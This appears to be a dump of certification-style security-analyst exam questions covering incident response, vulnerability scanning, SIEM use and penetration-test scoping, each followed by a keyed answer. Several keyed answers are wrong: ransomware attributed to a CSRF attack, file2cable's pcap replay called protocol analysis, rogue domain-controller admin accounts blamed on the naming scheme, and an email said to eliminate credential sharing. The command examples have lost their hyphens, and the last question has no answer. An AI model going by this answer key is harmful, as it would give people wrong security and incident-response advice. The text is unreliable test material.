Alerts have been received from the SIEM, indicating infections on multiple computers. Based on threat characteristics, these files were quarantined by the host-based antivirus program. At the same time, additional alerts in the SIEM show multiple blocked URLs from the address of the infected computers; the URLs were classified as uncategorized. The domain location of the IP address of the URLs that were blocked is checked, and it is registered to an ISP in Russia. Which of the following steps should be taken NEXT? Remove those computers from the network and replace the hard drives. Send the infected hard drives out for investigation. Run a full antivirus scan on all computers and use Splunk to search for any suspicious activity that happened just before the alerts were received in the SIEM. Run a vulnerability scan and patch discovered vulnerabilities on the next pathing cycle. Have the users restart their computers. Create a use case in the SIEM to monitor failed logins on the infected computers. Install a computer with the same settings as the infected computers in the DMZ to use as a honeypot. Permit the URLs classified as uncategorized to and from that host.
Run a full antivirus scan on all computers and use Splunk to search for any suspicious activity that happened just before the alerts were received in the SIEM.
Scan results identify critical Apache vulnerabilities on a companys web servers. A security analyst believes many of these results are false positives because the web environment mostly consists of Windows servers. Which of the following is the BEST method of verifying the scan results? Run a service discovery scan on the identified servers. Refer to the identified servers in the asset inventory. Perform a top-ports scan against the identified servers. Review logs of each host in the SIEM.
Run a service discovery scan on the identified servers.
A Chief Information Security Officer (CISO) needs to ensure that a laptop image remains unchanged and can be verified before authorizing the deployment of the image to 4000 laptops. Which of the following tools would be appropriate to use in this case? MSBA SHA1sum FIM DLP
SHA1sum
A centralized tool for organizing security events and managing their response and resolution is known as: SIEM HIPS Syslog Wireshark
SIEM
Which of the following is MOST effective for correlation analysis by log for threat management? PCAP SCAP IPS SIEM
SIEM
A retail corporation with widely distributed store locations and IP space must meet PCI requirements relating to vulnerability scanning. The organization plans to outsource this function to a third party to reduce costs. Which of the following should be used to communicate expectations related to the execution of scans? Vulnerability assessment report Lessons learned documentation SLA MOU
SLA
The IT department at a growing law firm wants to begin using a third-party vendor for vulnerability monitoring and mitigation. The executive director of the law firm wishes to outline the assumptions and expectations between the two companies. Which of the following documents might be referenced in the event of a security breach at the law firm? SLA MOU SOW NDA
SLA
A security analyst has a sample of malicious software and needs to know what the sample does? The analyst runs the sample in a carefully controlled and monitored virtual machine to observe the software behavior. Which of the following malware analysis approaches is this? White box testing Fuzzing Sandboxing Static code analysis
Sandboxing
Which of the following are essential components within the rules of engagement for a penetration test? (Select TWO). Schedule Authorization List of system administrators Payment terms Business justification
Schedule Authorization
During a red team engagement, a penetration tester found a production server. Which of the following portions of the SOW should be referenced to see if the server should be part of the testing engagement? Authorization Exploitation Communication Scope
Scope
A penetration tester is preparing for an audit of critical systems that may impact the security of the environment. This includes the external perimeter and the internal perimeter of the environment. During which of the following processes is this type of information normally gathered? Timing Scoping Authorization Enumeration
Scoping
A security analyst was asked to join an outage call for a critical web application. The web middleware support team determined the web server is running and having no trouble processing requests; however, some investigation has revealed firewall denies to the web server that began around 1.00 a.m. that morning. An emergency change was made to enable the access, but management has asked for a root cause determination. Which of the following would be the BEST next step? Install a packet analyzer near the web server to capture sample traffic to find anomalies. Block all traffic to the web server with an ACL. Use a port scanner to determine all listening ports on the web server. Search the logging servers for any rule changes.
Search the logging servers for any rule changes.
The security team for a large, international organization is developing a vulnerability management program. The development staff has expressed concern that the new program will cause service interruptions and downtime as vulnerabilities are remedied. Which of the following should the security team implement FIRST as a core component of the remediation process to address this concern? Automated patch management Change control procedures Security regression testing Isolation of vulnerable servers
Security regression testing
Which of the following remediation strategies are MOST effective in reducing the risk of a network-based compromise of embedded ICS? (Select two.) Patching NIDS Segmentation Disabling unused services Firewalling
Segmentation Disabling unused services
During which of the following NIST risk management framework steps would an information system security engineer identify inherited security controls and tailor those controls to the system? Categorize Select Implement Access
Select
A company invested ten percent of its entire annual budget in security technologies. The Chief Information Officer (CIO) is convinced that, without this investment, the company will risk being the next victim of the same cyber attack its competitor experienced three months ago. However, despite this investment, users are sharing their usernames and passwords with their coworkers to get their jobs done. Which of the following will eliminate the risk introduced by this practice? Invest in and implement a solution to ensure non-repudiation Force a daily password change Send an email asking users not to share their credentials Run a report on all users sharing their credentials and alert their managers of further actions
Send an email asking users not to share their credentials
After a recent security breach, it was discovered that a developer had promoted code that had been written to the production environment as a hotfix to resolve a user navigation issue that was causing issues for several customers. The code had inadvertently granted administrative privileges to all users, allowing inappropriate access to sensitive data and reports. Which of the following could have prevented this code from being released into the production environment? Cross training Succession planning Automated reporting Separation of duties
Separation of duties
A system administrator who was using an account with elevated privileges deleted a large amount of log files generated by a virtual hypervisor in order to free up disk space. These log files are needed by the security team to analyze the health of the virtual machines. Which of the following compensating controls would help prevent this from reoccurring? (Select two.) Succession planning Separation of duties Mandatory vacation Personnel training Job rotation
Separation of duties Personnel training
Which of the following is a feature of virtualization that can potentially create a single point of failure? Server consolidation Load balancing hypervisors Faster server provisioning Running multiple OS instances
Server consolidation
A security architect is reviewing the options for performing input validation on incoming web form submissions. Which of the following should the architect as the MOST secure and manageable option? Client-side whitelisting Server-side whitelisting Server-side blacklisting Client-side blacklisting
Server-side whitelisting
A suite of three production servers that were originally configured identically underwent the same vulnerability scans. However, recent results revealed the three servers has different critical vulnerabilities. The servers are not accessible by the Internet, and AV programs have not detected any malware. The servers syslog files do not show any unusual traffic since they were installed and are physically isolated in an off-site datacenter. Checksum testing of random executables does not reveal tampering. Which of the following scenarios is MOST likely? Servers have not been scanned with the latest vulnerability signature Servers have been attacked by outsiders using zero-day vulnerabilities Servers were made by different manufacturers Servers have received different levels of attention during previous patch management events
Servers have received different levels of attention during previous patch management events
Three similar production servers underwent a vulnerability scan. The scan results revealed that the three servers had two different vulnerabilities rated Critical. The administrator observed the following about the three servers: The servers are not accessible by the Internet AV programs indicate the servers have had malware as recently as two weeks ago The SIEM shows unusual traffic in the last 20 days Integrity validation of system files indicates unauthorized modifications Which of the following assessments is valid and what is the most appropriate NEXT step? (Select TWO). Servers may have been built inconsistently Servers may be generating false positives via the SIEM Servers may have been tampered with Activate the incident response plan Immediately rebuild servers from known good configurations Schedule recurring vulnerability scans on the servers
Servers may have been tampered with Activate the incident response plan
A company has received the results of an external vulnerability scan from its approved scanning vendor. The company is required to remediate these vulnerabilities for clients within 72 hours of acknowledgement of the scan results. Which of the following contract breaches would result if this remediation is not provided for clients within the time frame? Service level agreement Regulatory compliance Memorandum of understanding Organizational governance
Service level agreement
A recent audit included a vulnerability scan that found critical patches released 60 days prior were not applied to servers in the environment. The infrastructure team was able to isolate the issue and determined it was due to a service being disabled on the server running the automated patch management application. Which of the following would be the MOST efficient way to avoid similar audit findings in the future? Implement a manual patch management application package to regain greater control over the process. Create a patch management policy that requires all servers to be patched within 30 days of patch release. Implement service monitoring to validate that tools are functioning properly. Set services on the patch management server to automatically run on start-up.
Set services on the patch management server to automatically run on start-up.
Joe, an analyst, has received notice that a vendor who is coming in for a presentation will require access to a server outside the network. Currently, users are only able to access remote sites through a VPN connection. Which of the following should Joe use to BEST accommodate the vendor? Allow incoming IPSec traffic into the vendors IP address. Set up a VPN account for the vendor, allowing access to the remote site. Turn off the firewall while the vendor is in the office, allowing access to the remote site. Write a firewall rule to allow the vendor to have access to the remote site.
Set up a VPN account for the vendor, allowing access to the remote site.
A security analyst is performing a stealth black-box audit of the local WiFi network and is running a wireless sniffer to capture local WiFi network traffic from a specific wireless access point. The SSID is not appearing in the sniffing logs of the local wireless network traffic. Which of the following is the best action that should be performed NEXT to determine the SSID? Set up a fake wireless access point Power down the wireless access point Deauthorize users of that access point Spoof the MAC addresses of adjacent access points
Set up a fake wireless access point
A technician receives an alert indicating an endpoint is beaconing to a suspect dynamic DNS domain. Which of the following countermeasures should be used to BEST protect the network in response to this alert? (Choose two.) Set up a sinkhole for that dynamic DNS domain to prevent communication. Isolate the infected endpoint to prevent the potential spread of malicious activity. Implement an internal honeypot to catch the malicious traffic and trace it. Perform a risk assessment and implement compensating controls. Ensure the IDS is active on the network segment where the endpoint resides.
Set up a sinkhole for that dynamic DNS domain to prevent communication. Isolate the infected endpoint to prevent the potential spread of malicious activity.
A computer has been infected with a virus and is sending out a beacon to command and control server through an unknown service. Which of the following should a security technician implement to drop the traffic going to the command and control server and still be able to identify the infected host through firewall logs? Sinkhole Block ports and services Patches Endpoint security
Sinkhole
A cybersecurity analyst has several log files to review. Instead of using grep and cat commands, the analyst decides to find a better approach to analyze the logs. Given a list of tools, which of the following would provide a more efficient way for the analyst to conduct a timeline analysis, do keyword searches, and output a report? Kali Splunk Syslog OSSIM
Splunk
A security analyst is creating ACLs on a perimeter firewall that will deny inbound packets that are from internal addresses, reversed external addresses, and multicast addresses. Which of the following is the analyst attempting to prevent? Broadcast storms Spoofing attacks DDoS attacks Man-in-the-middle attacks
Spoofing attacks
A security analyst has been asked to remediate a server vulnerability. Once the analyst has located a patch for the vulnerability, which of the following should happen NEXT? Start the change control process. Rescan to ensure the vulnerability still exists. Implement continuous monitoring. Begin the incident response process.
Start the change control process.
External users are reporting that a web application is slow and frequently times out when attempting to submit information. Which of the following software development best practices would have helped prevent this issue? Stress testing Regression testing Input validation Fuzzing
Stress testing
A technician is running an intensive vulnerability scan to detect which ports are open to exploit. During the scan, several network services are disabled and production is affected. Which of the following sources would be used to evaluate which network service was interrupted? Syslog Network mapping Firewall logs NIDS
Syslog
A security administrator recently deployed a virtual honeynet. The honeynet is not protected by the companys firewall, while all production networks are protected by a stateful firewall. Which of the following would BEST allow an external penetration tester to determine which one is the honeynets network? Banner grab Packet analyzer Fuzzer TCP ACK scan
TCP ACK scan
Which of the following systems or services is MOST likely to exhibit issues stemming from the Heartbleed vulnerability (Choose two.) SSH daemons Web servers Modbus devices TLS VPN services IPSec VPN concentrators SMB service
TLS VPN services IPSec VPN concentrators
An administrator has been investigating the way in which an actor had been exfiltrating confidential data from a web server to a foreign host. After a thorough forensic review, the administrator determined the servers BIOS had been modified by rootkit installation. After removing the rootkit and flashing the BIOS to a known good state, which of the following would BEST protect against future adversary access to the BIOS, in case another rootkit is installed? Anti-malware application Host-based IDS TPM data sealing File integrity monitoring
TPM data sealing
Datacenter access is controlled with proximity badges that record all entries and exits from the datacenter. The access records are used to identify which staff members accessed the data center in the event of equipment theft. Which of the following MUST be prevented in order for this policy to be effective? Password reuse Phishing Social engineering Tailgating
Tailgating
A security analyst is assisting with a computer crime investigation and has been asked to secure a PC and deliver it to the forensic lab. Which of the following items would be MOST helpful to secure the PC? (Choose three.) Tamper-proof seals Faraday cage Chain of custody form Drive eraser Write blockers Network tap Multimeter
Tamper-proof seals Faraday cage Chain of custody form
A security analyst received several service tickets reporting that a company storefront website is not accessible by internal domain users. However, external users are accessing the website without issue. Which of the following is the MOST likely reason for this behavior? The FQDN is incorrect. The DNS server is corrupted. The time synchronization server is corrupted. The certificate is expired.
The DNS server is corrupted.
A company provides wireless connectivity to the internal network from all physical locations for company-owned devices. Users were able to connect the day before, but now all users have reported that when they connect to an access point in the conference room, they cannot access company resources. Which of the following BEST describes the cause of the problem? The access point is blocking access by MAC address. Disable MAC address filtering. The network is not available. Escalate the issue to network support. Expired DNS entries on users devices. Request the affected users perform a DNS flush. The access point is a rogue device. Follow incident response procedures.
The access point is a rogue device. Follow incident response procedures.
An alert is issued from the SIEM that indicates a large number of failed logins for the same account name on one of the application servers starting at 10:20 a.m. No other significant failed login activity is detected. Using Splunk to search for activity pertaining to that account name, a security analyst finds the account has been authenticating successfully for some time and started to fail this morning. The account is attempting to authenticate from an internal server that is running a database to an application server. No other security activity is detected on the network. The analyst discovers the account owner is a developer who no longer works for the company. Which of the following is the MOST likely reason for the failed login attempts for that account? The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account The host-based firewall is blocking port 389 LDAP communication, preventing the login credentials from being received by the application server The license for the application has expired, and the failed logins will continue to occur until a new license key is installed on the application A successful malware attack has provided someone access to the network, and failed login attempts are an indication of an attempt to privilege access to the application
The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account
A company has monthly scheduled windows for patching servers and applying configuration changes. Out-of-window changes can be done, but they are discouraged unless absolutely necessary. The systems administrator is reviewing the weekly vulnerability scan report that was just released. Which of the following vulnerabilities should the administrator fix without waiting for the next scheduled change window? The administrator should fix dns (53/tcp). BIND NAMED is an open-source DNS server from ISC.org. The BIND-based NAMED server (or DNS servers) allow remote users to query for version and type information. The administrator should fix smtp (25/tcp). The remote SMTP server is insufficiently protected against relaying. This means spammers might be able to use the companys mail server to send their emails to the world. The administrator should fix http (80/tcp). An information leak occurs on Apache web servers with the UserDir module enabled, allowing an attacker to enumerate accounts by requesting access to home directories and monitoring the response. The administrator should fix http (80/tcp). The greeting.cgi script is installed. This CGI has a well-known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon. The administrator should fix general/tcp. The remote host does not discard TCP SYN packets that have the FIN flag set. Depending on the kind of firewall a company is using, an attacker may use this flaw to bypass its rules.
The administrator should fix smtp (25/tcp). The remote SMTP server is insufficiently protected against relaying. This means spammers might be able to use the companys mail server to send their emails to the world.
While a threat intelligence analyst was researching an indicator of compromise on a search engine, the web proxy generated an alert regarding the same indicator. The threat intelligence analyst states that related sites were not visited but were searched for in a search engine. Which of the following MOST likely happened in this situation? The analyst is not using the standard approved browser. The analyst accidently clicked a link related to the indicator. The analyst has prefetch enabled on the browser in use. The alert in unrelated to the analysts search.
The analyst has prefetch enabled on the browser in use.
Given the following output from a Linux machine: file2cable i eth0 -f file.pcap Which of the following BEST describes what a security analyst is trying to accomplish? The analyst is attempting to measure bandwidth utilization on interface eth0. The analyst is attempting to capture traffic on interface eth0. The analyst is attempting to replay captured data from a PCAP file. The analyst is attempting to capture traffic for a PCAP file. The analyst is attempting to use a protocol analyzer to monitor network traffic.
The analyst is attempting to use a protocol analyzer to monitor network traffic.
A security analyst is reviewing logs and discovers that a company-owned computer issued to an employee is generating many alerts and warnings. The analyst continues to review the log events and discovers that a non-company-owned device from a different, unknown IP address is generating the same events. The analyst informs the manager of these findings, and the manager explains that these activities are already known and part of an ongoing events. Given this scenario, which of the following roles are the analyst, the employee, and the manager filling? The analyst is red team. The employee is blue team. The manager is white team. The analyst is white team. The employee is red team. The manager is blue team. The analyst is red team. The employee is white team. The manager is blue team. The analyst is blue team. The employee is red team. The manager is white team.
The analyst is blue team. The employee is red team. The manager is white team.
A security analyst has created an image of a drive from an incident. Which of the following describes what the analyst should do NEXT? The analyst should create a backup of the drive and then hash the drive. The analyst should begin analyzing the image and begin to report findings. The analyst should create a hash of the image and compare it to the original drives hash. The analyst should create a chain of custody document and notify stakeholders.
The analyst should create a hash of the image and compare it to the original drives hash.
A list of vulnerabilities has been reported in a companys most recent scan of a server. The security analyst must review the vulnerabilities and decide which ones should be remediated in the next change window and which ones can wait or may not need patching. Pending further investigation. Which of the following vulnerabilities should the analyst remediate FIRST? The analyst should remediate https (443/tcp) first. This web server is susceptible to banner grabbing and was fingerprinted as Apache/1.3.27-9 on Linux w/ mod_fastcgi. The analyst should remediate dns (53/tcp) first. The remote BIND 9 DNS server is susceptible to a buffer overflow, which may allow an attacker to gain a shell on this host or disable this server. The analyst should remediate imaps (993/tcp) first. The SSLv2 suite offers five strong ciphers and two weak export class ciphers. The analyst should remediate ftp (21/tcp) first. An outdated version of FTP is running on this port. If it is not in use, it should be disabled.
The analyst should remediate dns (53/tcp) first. The remote BIND 9 DNS server is susceptible to a buffer overflow, which may allow an attacker to gain a shell on this host or disable this server.
An insurance company employs quick-response team drivers that carry corporate-issued mobile devices with the insurance companys app installed on them. Devices are configuration-hardened by an MDM and kept up to date. The employees use the app to collect insurance claim information and process payments. Recently, a number of customers have filed complaints of credit card fraud against the insurance company, which occurred shortly after their payments were processed via the mobile app. The cyber-incident response team has been asked to investigate. Which of the following is MOST likely the cause? The MDM server is misconfigured. The app does not employ TLS. USB tethering is enabled. 3G and less secure cellular technologies are not restricted.
The app does not employ TLS.
Which of the following principles describes how a security analyst should communicate during an incident? The communication should be limited to trusted parties only. The communication should be limited to security staff only. The communication should come from law enforcement. The communication should be limited to management only.
The communication should be limited to trusted parties only.
A company has a popular shopping cart website hosted geographically diverse locations. The company has started hosting static content on a content delivery network (CDN) to improve performance. The CDN provider has reported the company is occasionally sending attack traffic to other CDN-hosted targets. Which of the following has MOST likely occurred? The CDN provider has mistakenly performed a GeoIP mapping to the company. The CDN provider has misclassified the network traffic as hostile. A vulnerability scan has tuned to exclude web assets hosted by the CDN. The company has been breached, and customer PII is being exfiltrated to the CDN.
The company has been breached, and customer PII is being exfiltrated to the CDN.
A cybersecurity analyst has identified a new mission-essential function that utilizes a public cloud-based system. The analyst needs to classify the information processed by the system with respect to CIA. Which of the following should provide the CIA classification for the information? The cloud provider The data owner The cybersecurity analyst The system administrator
The data owner
A security analysts company uses RADIUS to support a remote sales staff of more than 700 people. The Chief Information Security Officer (CISO) asked to have IPSec using ESP and 3DES enabled to ensure the confidentiality of the communication as per RFC 3162. After the implementation was complete, many sales users reported latency issues and other performance issues when attempting to connect remotely. Which of the following is occurring? The device running RADIUS lacks sufficient RAM and processing power to handle ESP implementation. RFC 3162 is known to cause significant performance problems. The IPSec implementation has significantly increased the amount of bandwidth needed. The implementation should have used AES instead of 3DES.
The device running RADIUS lacks sufficient RAM and processing power to handle ESP implementation.
An employee was conducting research on the Internet when a message from cyber criminals appeared on the screen, stating the hard drive was just encrypted by a ransomware variant. An analyst observes the following: Antivirus signatures were updated recently The desktop background was changed Web proxy logs show browsing to various information security sites and ad network traffic There is a high volume of hard disk activity on the file server SMTP server shown the employee recently received several emails from blocked senders The company recently switched web hosting providers There are several IPS alerts for external port scans Which of the following describes how the employee got this type of ransomware? The employee fell victim to a CSRF attack The employee was using another users credentials The employee opened an email attachment The employee updated antivirus signatures
The employee fell victim to a CSRF attack
A security analyst is adding input to the incident response communication plan. A company officer has suggested that if a data breach occurs, only affected parties should be notified to keep an incident from becoming a media headline. Which of the following should the analyst recommend to the company officer? The first responder should contact law enforcement upon confirmation of a security incident in order for a forensics team to preserve chain of custody. Guidance from laws and regulations should be considered when deciding who must be notified in order to avoid fines and judgements from non-compliance. An externally hosted website should be prepared in advance to ensure that when an incident occurs victims have timely access to notifications from a non-compromised recourse. The HR department should have information security personnel who are involved in the investigation of the incident sign non-disclosure agreements so the company cannot be held liable for customer data that might be viewed during an investigation.
The first responder should contact law enforcement upon confirmation of a security incident in order for a forensics team to preserve chain of custody.
A security analyst at a large financial institution is evaluating the security posture of a smaller financial company. The analyst is performing the evaluation as part of a due diligence process prior to a potential acquisition. With which of the following threats should the security analyst be MOST concerned? (Choose two.) Breach of confidentiality and market risks can occur if the potential acquisition is leaked to the press. The parent company is only going through this process to identify and steal the intellectual property of the smaller company. Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers. Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers. The industry regulator may decide that the acquisition will result in unfair competitive advantage if the acquisition were to take place. The company being acquired may already be compromised and this could pose a risk to the parent companys assets.
The industry regulator may decide that the acquisition will result in unfair competitive advantage if the acquisition were to take place. The company being acquired may already be compromised and this could pose a risk to the parent companys assets.
A security incident has been created after noticing unusual behavior from a Windows domain controller. The server administrator has discovered that a user logged in to the server with elevated permissions, but the users account does not follow the standard corporate naming scheme. There are also several other accounts in the administrators group that do not follow this naming scheme. Which of the following is the possible cause for this behavior and the BEST remediation step? The Windows Active Directory domain controller has not completed synchronization, and should force the domain controller to sync. The server has been compromised and should be removed from the network and cleaned before reintroducing it to the network. The server administrator created user accounts cloning the wrong user ID, and the accounts should be removed from administrators and placed in an employee group. The naming scheme allows for too many variations, and the account naming convention should be updates to enforce organizational policies.
The naming scheme allows for too many variations, and the account naming convention should be updates to enforce organizational policies.
Several users have reported that when attempting to save documents in team folders, the following message is received: The File Cannot Be Copied or Moved Service Unavailable. Upon further investigation, it is found that the syslog server is not obtaining log events from the file server to which the users are attempting to copy files. Which of the following is the MOST likely scenario causing these issues? The network is saturated, causing network congestion The file server is experiencing high CPU and memory utilization Malicious processes are running on the file server All the available space on the file server is consumed
The network is saturated, causing network congestion
Which of the following could be directly impacted by an unpatched vulnerability in vSphere ESXi? The organizations physical routers The organizations mobile devices The organizations virtual infrastructure The organizations VPN
The organizations virtual infrastructure
A system administrator recently deployed and verified the installation of a critical patch issued by the companys primary OS vendor. This patch was supposed to remedy a vulnerability that would allow an adversary to remotely execute code from over the network. However, the administrator just ran a vulnerability assessment of networked systems, and each of them still reported having the same vulnerability. Which of the following is the MOST likely explanation for this? The administrator entered the wrong IP range for the assessment. The administrator did not wait long enough after applying the patch to run the assessment. The patch did not remediate the vulnerability. The vulnerability assessment returned false positives.
The patch did not remediate the vulnerability.
Which of the following policies BEST explains the purpose of a data ownership policy? The policy should describe the roles and responsibilities between users and managers, and the management of specific data types. The policy should establish the protocol for retaining information types based on regulatory or business needs. The policy should document practices that users must adhere to in order to access data on the corporate network or Internet. The policy should outline the organizations administration of accounts for authorized users to access the appropriate data.
The policy should outline the organizations administration of accounts for authorized users to access the appropriate data.
A security analyst is reviewing output from a CVE-based vulnerability scanner. Before conducting the scan, the analyst was careful to select only Windows-based servers in a specific datacenter. The scan revealed that the datacenter includes 27 machines running Windows 2003 Server Edition (Win2003SE). In 2015, there were 36 new vulnerabilities discovered in the Win2003SE environment. Which of the following statements are MOST likely applicable? (Choose two.) Remediation is likely to require some form of compensating control. Microsofts published schedule for updates and patches for Win2003SE have continued uninterrupted. Third-party vendors have addressed all of the necessary updates and patches required by Win2003SE. The resulting report on the vulnerability scan should include some reference that the scan of the datacenter included 27 Win2003SE machines that should be scheduled for replacement and deactivation. Remediation of all Win2003SE machines requires changes to configuration settings and compensating controls to be made through Microsoft Security Centers Win2003SE Advanced Configuration Toolkit.
The resulting report on the vulnerability scan should include some reference that the scan of the datacenter included 27 Win2003SE machines that should be scheduled for replacement and deactivation.
An organization is performing vendor selection activities for penetration testing, and a security analyst is reviewing the MOA and rules of engagement, which were supplied with proposals. Which of the following should the analyst expect will be included in the documents and why? The scope of the penetration test should be included in the MOA to ensure penetration testing is conducted against only specifically authorized network resources. The MOA should address the client SLA in relation to reporting results to regulatory authorities, including issuing banks for organizations that process cardholder data. The rules of engagement should include detailed results of the penetration scan, including all findings, as well as designation of whether vulnerabilities identified during the scanning phases are found to be exploitable during the penetration test. The exploitation standards should be addressed in the rules of engagement to ensure both parties are aware of the depth of exploitation that will be attempted by penetration testers.
The rules of engagement should include detailed results of the penetration scan, including all findings, as well as designation of whether vulnerabilities identified during the scanning phases are found to be exploitable during the penetration test.
An application development company released a new version of its software to the public. A few days after the release, the company is notified by end users that the application is notably slower, and older security bugs have reappeared in the new release. The development team has decided to include the security analyst during their next development cycle to help address the reported issues. Which of the following should the security analyst focus on to remedy the existing reported problems? The security analyst should perform security regression testing during each application development cycle. The security analyst should perform end user acceptance security testing during each application development cycle. The security analyst should perform secure coding practices during each application development cycle. The security analyst should perform application fuzzing to locate application vulnerabilities during each application development cycle.
The security analyst should perform security regression testing during each application development cycle.
A security analyst has determined that the user interface on an embedded device is vulnerable to common SQL injections. The device is unable to be replaced, and the software cannot be upgraded. Which of the following should the security analyst recommend to add additional security to this device? The security analyst should recommend this device be placed behind a WAF. The security analyst should recommend an IDS be placed on the network segment. The security analyst should recommend this device regularly export the web logs to a SIEM system. The security analyst should recommend this device be included in regular vulnerability scans.
The security analyst should recommend this device be placed behind a WAF.
The business has been informed of a suspected breach of customer data. The internal audit team, in conjunction with the legal department, has begun working with the cybersecurity team to validate the report. To which of the following response processes should the business adhere during the investigation? The security analysts should not respond to internal audit requests during an active investigation The security analysts should report the suspected breach to regulators when an incident occurs The security analysts should interview system operators and report their findings to the internal auditors The security analysts should limit communication to trusted parties conducting the investigation
The security analysts should limit communication to trusted parties conducting the investigation
A security analyst begins to notice the CPU utilization from a sinkhole has begun to spike. Which of the following describes what may be occurring? Someone has logged on to the sinkhole and is using the device. The sinkhole has begun blocking suspect or malicious traffic. The sinkhole has begun rerouting unauthorized traffic. Something is controlling the sinkhole and causing CPU spikes due to malicious utilization.
The sinkhole has begun rerouting unauthorized traffic.
Due to a security breach initiated from South America, the Chief Security Officer (CSO) instructed a team to design and implement an appropriate security control to prevent such an attack from reoccurring. The company has sales and consulting teams across the United States that need access to company resources. The security manager implemented a location-based authentication to prevent non-US-based access to the company networks. Three months later, the same incident reoccurred with an attack originating from a country in Asia. Which of the following security design defects could be the cause? The team did not account for the VPN access and did not ensure non-repudiation The company just replaced a firewall that had a DDoS vulnerability The sales and supports are reusing the same passwords for their personal accounts, such as banking and email The hackers left a backdoor within the company networks that was not cleaned successfully
The team did not account for the VPN access and did not ensure non-repudiation
Which of the following has the GREATEST impact to the data retention policies of an organization? The CIA classification matrix assigned to each piece of data The level of sensitivity of the data established by the data owner The regulatory requirements concerning the data set The technical constraints of the technology used to store the data
The technical constraints of the technology used to store the data
An organization suspects it has had a breach, and it is trying to determine the potential impact. The organization knows the following: The source of the breach is linked to an IP located in a foreign country. The breach is isolated to the research and development servers. The hash values of the data before and after the breach are unchanged. The affected servers were regularly patched, and a recent scan showed no vulnerabilities. Which of the following conclusions can be drawn with respect to the threat and impact? (Choose two.) The confidentiality of the data is unaffected. The threat is an APT. The source IP of the threat has been spoofed. The integrity of the data is unaffected. The threat is an insider.
The threat is an APT. The integrity of the data is unaffected.
A new policy requires the security team to perform web application and OS vulnerability scans. All of the companys web applications use federated authentication and are accessible via a central portal. Which of the following should be implemented to ensure a more thorough scan of the companys web application, while at the same time reducing false positives? The vulnerability scanner should be configured to perform authenticated scans. The vulnerability scanner should be installed on the web server. The vulnerability scanner should implement OS and network service detection. The vulnerability scanner should scan for known and unknown vulnerabilities.
The vulnerability scanner should be configured to perform authenticated scans.
A malware infection spread to numerous workstations within the marketing department. The workstations were quarantined and replaced with machines. Which of the following represents a FINAL step in the eradication of the malware? The workstations should be isolated from the network. The workstations should be donated for reuse. The workstations should be reimaged. The workstations should be patched and scanned.
The workstations should be patched and scanned.
A vulnerability analyst needs to identify all systems with unauthorized web servers on the 10.1.1.0/24 network. The analyst uses the following default Nmap scan: nmap sV p 1-65535 10.1.1.0/24 Which of the following would be the result of running the above command? This scan checks all TCP ports. This scan probes all ports and returns open ones. This scan checks all TCP ports and returns versions. This scan identifies unauthorized servers.
This scan checks all TCP ports and returns versions.
Following a recent security breach, a post-mortem was done to analyze the driving factors behind the breach. The cybersecurity analysis discussed potential impacts, mitigations, and remediations based on current events and emerging threat vectors tailored to specific stakeholders. Which of the following is this considered to be? Threat intelligence Threat information Threat data Advanced persistent threats
Threat intelligence
A cybersecurity analyst has been asked to follow a corporate process that will be used to manage vulnerabilities for an organization. The analyst notices the policy has not been updated in three years. Which of the following should the analyst check to ensure the policy is still accurate? Threat intelligence reports Technical constraints Corporate minutes Governing regulations
Threat intelligence reports
As part of an upcoming engagement for a client, an analyst is configuring a penetration testing application to ensure the scan complies with information defined in the SOW. Which of the following types of information should be considered based on information traditionally found in the SOW? (Select two.) Timing of the scan Contents of the executive summary report Excluded hosts Maintenance windows IPS configuration Incident response policies
Timing of the scan Excluded hosts
A computer at a company was used to commit a crime. The system was seized and removed for further analysis. Which of the following is the purpose of labeling cables and connections when seizing the computer system? To capture the system configuration as it was at the time it was removed To maintain the chain of custody To block any communication with the computer system from attack To document the model, manufacturer, and type of cables connected
To capture the system configuration as it was at the time it was removed
Which of the following describes why it is important for an organizations incident response team and legal department to meet and discuss communication processes during the incident response process? To comply with existing organization policies and procedures on interacting with internal and external parties To ensure all parties know their roles and effective lines of communication are established To identify which group will communicate details to law enforcement in the event of a security incident To predetermine what details should or should not be shared with internal or external parties in the event of an incident
To comply with existing organization policies and procedures on interacting with internal and external parties
Which of the following describes why it is important to include scope within the rules of engagement of a penetration test? To ensure the network segment being tested has been properly secured To ensure servers are not impacted and service is not degraded To ensure all systems being scanned are owned by the company To ensure sensitive hosts are not scanned
To ensure all systems being scanned are owned by the company
After implementing and running an automated patching tool, a security administrator ran a vulnerability scan that reported no missing patches found. Which of the following BEST describes why this tool was used? To create a chain of evidence to demonstrate when the servers were patched. To harden the servers against new attacks. To provide validation that the remediation was active. To generate log data for unreleased patches.
To harden the servers against new attacks.
A Linux-based file encryption malware was recently discovered in the wild. Prior to running the malware on a preconfigured sandbox to analyze its behavior, a security professional executes the following command: umount a t cifs,nfs Which of the following is the main reason for executing the above command? To ensure the malware is memory bound. To limit the malwares reach to the local host. To back up critical files across the network To test if the malware affects remote systems
To limit the malwares reach to the local host.
Which of the following represent the reasoning behind careful selection of the timelines and time-of-day boundaries for an authorized penetration test? (Select TWO). To schedule personnel resources required for test activities To determine frequency of team communication and reporting To mitigate unintended impacts to operations To avoid conflicts with real intrusions that may occur To ensure tests have measurable impact to operations
To schedule personnel resources required for test activities To mitigate unintended impacts to operations
Which of the following is a control that allows a mobile application to access and manipulate information which should only be available by another application on the same mobile device (e.g. a music application posting the name of the current song playing on the device on a social media site)? Co-hosted application Transitive trust Mutually exclusive access Dual authentication
Transitive trust
An executive tasked a security analyst to aggregate past logs, traffic, and alerts on a particular attack vector. The analyst was then tasked with analyzing the data and making predictions on future complications regarding this attack vector. Which of the following types of analysis is the security analyst MOST likely conducting? Trend analysis Behavior analysis Availability analysis Business analysis
Trend analysis
In reviewing service desk requests, management has requested that the security analyst investigate the requests submitted by the new human resources manager. The requests consist of unlocking files that belonged to the previous human manager. The security analyst has uncovered a tool that is used to display five-level passwords. This tool is being used by several members of the service desk to unlock files. The content of these particular files is highly sensitive information pertaining to personnel. Which of the following BEST describes this scenario? (Choose two.) Unauthorized data exfiltration Unauthorized data masking Unauthorized access Unauthorized software Unauthorized controls
Unauthorized access
An analyst is troubleshooting a PC that is experiencing high processor and memory consumption. Investigation reveals the following processes are running on the system: lsass.exe csrss.exe wordpad.exe notepad.exe Which of the following tools should the analyst utilize to determine the rogue process? Ping 127.0.0.1. Use grep to search. Use Netstat. Use Nessus.
